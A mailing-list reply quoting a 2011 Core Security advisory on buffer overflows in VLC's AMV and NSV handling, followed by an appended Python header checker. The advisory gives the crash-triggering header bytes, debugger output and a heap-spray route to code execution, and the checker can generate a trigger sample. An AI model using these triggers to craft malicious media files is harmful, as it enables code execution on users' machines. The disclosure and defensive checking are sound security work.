Hmm...well, this is one vulnerability, not two, and it was fixed in VLC's tree on February 12. Still a nice find.
-Dan

On Wed, Mar 23, 2011 at 4:34 PM, CORE Security Technologies Advisories <[email protected]> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Core Security Technologies - Corelabs Advisory
> http://corelabs.coresecurity.com/
>
> VLC Vulnerabilities handling .AMV and .NSV files
>
> 1. *Advisory Information*
>
> Title: VLC Vulnerabilities handling .AMV and .NSV files
> Advisory ID: CORE-2011-0208
> Advisory URL: http://www.coresecurity.com/content/vlc-vulnerabilities-amv-nsv-files
> Date published: 2011-03-23
> Date of last update: 2011-03-23
> Vendors contacted: VLC team
> Release mode: Coordinated release
>
> 2. *Vulnerability Information*
>
> Class: Buffer overflow [CWE-119], Buffer overflow [CWE-119]
> Impact: Code execution
> Remotely Exploitable: Yes (client-side)
> Locally Exploitable: No
> CVE Name: CVE-2010-3275, CVE-2010-3276
>
> 3. *Vulnerability Description*
>
> Two vulnerabilities have been found in VLC media player [1], when handling .AMV and .NSV file formats. These vulnerabilities can be exploited by a remote attacker to obtain arbitrary code execution with the privileges of the user running VLC.
>
> 4. *Vulnerable packages*
>
> . VLC 1.1.4
> . VLC 1.1.5
> . VLC 1.1.6
> . VLC 1.1.7
> . Older versions may be affected, but were not checked.
>
> 5. *Non-vulnerable packages*
>
> . VLC 1.1.8
>
> 6. *Vendor Information, Solutions and Workarounds*
>
> These vulnerabilities are fixed in VLC version 1.1.8, which can be downloaded from http://www.videolan.org/
>
> 7. *Credits*
>
> These vulnerabilities were discovered and researched by Ricardo Narvaja from Core Security Technologies. Publication was coordinated by Carlos Sarraute.
>
> 8. *Technical Description / Proof of Concept Code*
>
> 8.1. *Vulnerability in VLC 1.1.4 to 1.1.7 when handling AMV files [CVE-2010-3275]*
>
> This vulnerability was found by fuzzing different formats. In AMV files, if the offset 0x41 is changed to a value greater than 90 as shown below:
>
> /-----
> Offset(h)
>
> 00000000  52 49 46 46 00 00 00 00 41 4D 56 20 4C 49 53 54  RIFF....AMV LIST
> 00000010  00 00 00 00 68 64 72 6C 61 6D 76 68 38 00 00 00  ....hdrlamvh8...
> 00000020  24 F4 00 00 00 00 00 00 00 00 00 00 00 00 00 00  $ô..............
> 00000030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
> 00000040  A0 A0
>
> - -----/
>
> Then the program will crash in the following plugin:
>
> /-----
> Executable modules, item 248
> Base=6D680000
> Size=00017000 (94208.)
> Entry=6D6810C0 libdir_1.<ModuleEntryPoint>
> Name=libdir_1
> Path=C:\Program Files\VideoLAN\VLC\plugins\libdirectx_plugin.dll
>
> - -----/
>
> More precisely in this location:
>
> /-----
> 6D6812A1  8B10           MOV EDX,DWORD PTR DS:[EAX]
> 6D6812A3  894C24 04      MOV DWORD PTR SS:[ESP+4],ECX
> 6D6812A7  890424         MOV DWORD PTR SS:[ESP],EAX
> 6D6812AA  FF92 80000000  CALL DWORD PTR DS:[EDX+80]
>
> offset
>
> 000006A1  8B10           MOV EDX,DWORD PTR DS:[EAX]
> 000006A3  894C24 04      MOV DWORD PTR SS:[ESP+4],ECX
> 000006A7  890424         MOV DWORD PTR SS:[ESP],EAX
> 000006AA  FF92 80000000  CALL DWORD PTR DS:[EDX+80]
>
> registers
>
> EAX 3DD1255C
> ECX 00000000
> EDX 3032344A
> EBX 3DDF9410
> ESP 3F82FC04
> EBP 3DD1229C
> ESI 3DD1255C
> EDI 3DDF90BC
> EIP 6D6812AA libdir_1.6D6812AA
>
> - -----/
>
> When executing an appropriate heap spray in Internet Explorer:
>
> /-----
> 303234CA  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  ................
> 303234DA  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  ................
> 303234EA  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  ................
> 303234FA  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  ................
> 3032350A  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  ................
> 3032351A  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  ................
> 3032352A  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  ................
>
> - -----/
>
> We manage to take control of the execution flow and execute our code:
>
> /-----
> 0C0C0C0C  0C 0C  OR AL,0C
> 0C0C0C0E  0C 0C  OR AL,0C
> 0C0C0C10  0C 0C  OR AL,0C
> 0C0C0C12  0C 0C  OR AL,0C
> 0C0C0C14  0C 0C  OR AL,0C
> 0C0C0C16  0C 0C  OR AL,0C
> 0C0C0C18  0C 0C  OR AL,0C
> 0C0C0C1A  0C 0C  OR AL,0C
> 0C0C0C1C  0C 0C  OR AL,0C
> 0C0C0C1E  0C 0C  OR AL,0C
> 0C0C0C20  0C 0C  OR AL,0C
> 0C0C0C22  0C 0C  OR AL,0C
> 0C0C0C24  0C 0C  OR AL,0C
> 0C0C0C26  0C 0C  OR AL,0C
>
> - -----/
>
> 8.2. *Vulnerability in VLC 1.1.4 to 1.1.7 when handling NSV files [CVE-2010-3276]*
>
> In NSV files, when changing the offsets 0x0b to 0x0e as shown below:
>
> /-----
> Offset(h)
>
> 00000000  4E 53 56 73 56 50 33 31 4D 50 33 98 00 99 01 01  NSVsVP31MP3_._..
>
> - -----/
>
> We can make the program crash in the following plugin:
>
> /-----
> Executable modules, item 248
> Base=6D680000
> Size=00017000 (94208.)
> Entry=6D6810C0 libdir_1.<ModuleEntryPoint>
> Name=libdir_1
> Path=C:\Program Files\VideoLAN\VLC\plugins\libdirectx_plugin.dll
>
> - -----/
>
> More precisely in this location:
>
> /-----
> 6D6812A1  8B10           MOV EDX,DWORD PTR DS:[EAX]
> 6D6812A3  894C24 04      MOV DWORD PTR SS:[ESP+4],ECX
> 6D6812A7  890424         MOV DWORD PTR SS:[ESP],EAX
> 6D6812AA  FF92 80000000  CALL DWORD PTR DS:[EDX+80]
>
> offset
>
> 000006A1  8B10           MOV EDX,DWORD PTR DS:[EAX]
> 000006A3  894C24 04      MOV DWORD PTR SS:[ESP+4],ECX
> 000006A7  890424         MOV DWORD PTR SS:[ESP],EAX
> 000006AA  FF92 80000000  CALL DWORD PTR DS:[EDX+80]
>
> registers
>
> EAX 37CE12FC ASCII "I420"
> ECX 00000000
> EDX 30323449
> EBX 37D8F268
> ESP 3865FC04
> EBP 37CE103C
> ESI 37CE12FC ASCII "I420"
> EDI 37D8E314
> EIP 6D6812AA libdirec.6D6812AA
>
> - -----/
>
> When executing an appropriate heap spray in Internet Explorer:
>
> /-----
> 303234CA  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  ................
> 303234DA  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  ................
> 303234EA  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  ................
> 303234FA  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  ................
> 3032350A  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  ................
> 3032351A  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  ................
> 3032352A  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  ................
>
> - -----/
>
> We make the execution continue in our code:
>
> /-----
> 0C0C0C0C  0C 0C  OR AL,0C
> 0C0C0C0E  0C 0C  OR AL,0C
> 0C0C0C10  0C 0C  OR AL,0C
> 0C0C0C12  0C 0C  OR AL,0C
> 0C0C0C14  0C 0C  OR AL,0C
> 0C0C0C16  0C 0C  OR AL,0C
> 0C0C0C18  0C 0C  OR AL,0C
> 0C0C0C1A  0C 0C  OR AL,0C
> 0C0C0C1C  0C 0C  OR AL,0C
> 0C0C0C1E  0C 0C  OR AL,0C
> 0C0C0C20  0C 0C  OR AL,0C
> 0C0C0C22  0C 0C  OR AL,0C
> 0C0C0C24  0C 0C  OR AL,0C
> 0C0C0C26  0C 0C  OR AL,0C
>
> - -----/
>
> 9. *Report Timeline*
>
> . 2011-02-08:
> Core Security Technologies notifies the VLC team of the vulnerabilities. Publication date is temporarily set to February 28, 2011.
>
> . 2011-02-08:
> VLC team acknowledges notification and provides PGP keys.
>
> . 2011-02-09:
> Core sends a technical description and PoC files that trigger the vulnerabilities.
>
> . 2011-02-18:
> Core asks the VLC team whether they could reproduce the vulnerabilities.
>
> . 2011-02-23:
> VLC team replies that fixes will be included in VLC 1.1.8, and that they believe the issue is not exploitable.
>
> . 2011-02-25:
> Core replies that the issues have been confirmed to be exploitable, and that the researcher has developed fully working exploits. Core offers to reschedule the publication of its advisory to coordinate it with the release of fixes.
>
> . 2011-03-10:
> Core requests an update on this issue, since no reply was received. Core notes that the PoC files and exploits were tested on Windows only, and reschedules publication to March 16, stating that the advisory will be published as "user release" if no reply is received.
>
> . 2011-03-10:
> VLC team requests two additional weeks for the release of fixes, and asks whether the vulnerabilities are exploitable with ASLR.
>
> . 2011-03-14:
> Core agrees to postpone publication, confirms that the bugs are exploitable with ASLR, and requests a concrete date for the release.
>
> . 2011-03-16:
> VLC team states that they would like to release on March 23rd.
>
> . 2011-03-18:
> Core agrees with the release date.
>
> . 2011-03-23:
> Advisory CORE-2011-0208 is published.
>
> 10. *References*
>
> [1] VLC media player http://www.videolan.org/
>
> 11. *About CoreLabs*
>
> CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
>
> 12. *About Core Security Technologies*
>
> Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and prove real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
>
> Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups.
> Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
>
> 13. *Disclaimer*
>
> The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us
>
> 14. *PGP/GPG Keys*
>
> This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
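The advisory above gives the AMV trigger only as a hex dump (offset 0x41 above 90) and the crash site as an indirect call through a corrupted pointer. As an added example, not code from Core or from VLC, here is a bounds-checked walk of the RIFF/AMV header that a defender could run over files before they reach an unpatched player: every chunk length is verified against the enclosing container before any field is read, and the byte at offset 0x41 is rejected above the advisory's limit. The sample builder is constructed here, with RIFF/LIST sizes made self-consistent (the dump leaves them zero), and the meaning of the byte at 0x41 is not stated in the advisory, so it is only bounded, not interpreted.

```python
import struct

# Advisory facts: VLC 1.1.4-1.1.7 crash when the byte at AMV file offset 0x41
# exceeds 90. The advisory does not say what the byte means, so we only bound it.
FIELD_OFFSET = 0x41
FIELD_MAX = 90


def build_amv(field_byte: int) -> bytes:
    """Constructed sample: the advisory's header layout with self-consistent
    RIFF/LIST sizes and the amvh chunk zero-padded to its declared 0x38 bytes."""
    amvh = bytearray(0x38)
    amvh[0:4] = struct.pack("<I", 0xF424)   # first amvh dword from the dump
    amvh[0x20] = 0xA0                       # file offset 0x40 in the dump
    amvh[0x21] = field_byte                 # file offset 0x41, the advisory's trigger
    hdrl = b"hdrl" + b"amvh" + struct.pack("<I", len(amvh)) + bytes(amvh)
    body = b"AMV " + b"LIST" + struct.pack("<I", len(hdrl)) + hdrl
    return b"RIFF" + struct.pack("<I", len(body)) + body


def check_amv(data: bytes):
    """Bounds-checked walk of the RIFF/AMV header; returns (ok, reason)."""
    def u32(off: int) -> int:
        if off + 4 > len(data):
            raise ValueError(f"read past end of file at 0x{off:x}")
        return struct.unpack_from("<I", data, off)[0]
    try:
        if data[0:4] != b"RIFF" or data[8:12] != b"AMV ":
            return False, "not a RIFF/AMV file"
        if u32(4) != len(data) - 8:
            return False, "RIFF size does not match file size"
        if data[12:16] != b"LIST" or data[20:24] != b"hdrl":
            return False, "missing LIST/hdrl"
        list_end = 20 + u32(16)              # LIST size counts from its form type
        if list_end > len(data):
            return False, "LIST size exceeds file"
        if data[24:28] != b"amvh":
            return False, "missing amvh chunk"
        amvh_end = 32 + u32(28)
        if amvh_end > list_end:
            return False, "amvh chunk exceeds its LIST"
        if FIELD_OFFSET >= amvh_end:
            return False, "amvh chunk too short to contain offset 0x41"
        if data[FIELD_OFFSET] > FIELD_MAX:
            return False, f"byte at 0x{FIELD_OFFSET:x} is {data[FIELD_OFFSET]}, above {FIELD_MAX}"
        return True, "header within advisory limits"
    except ValueError as exc:
        return False, str(exc)


if __name__ == "__main__":
    for value in (0x00, 0xA0):
        print(hex(value), check_amv(build_amv(value)))
```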
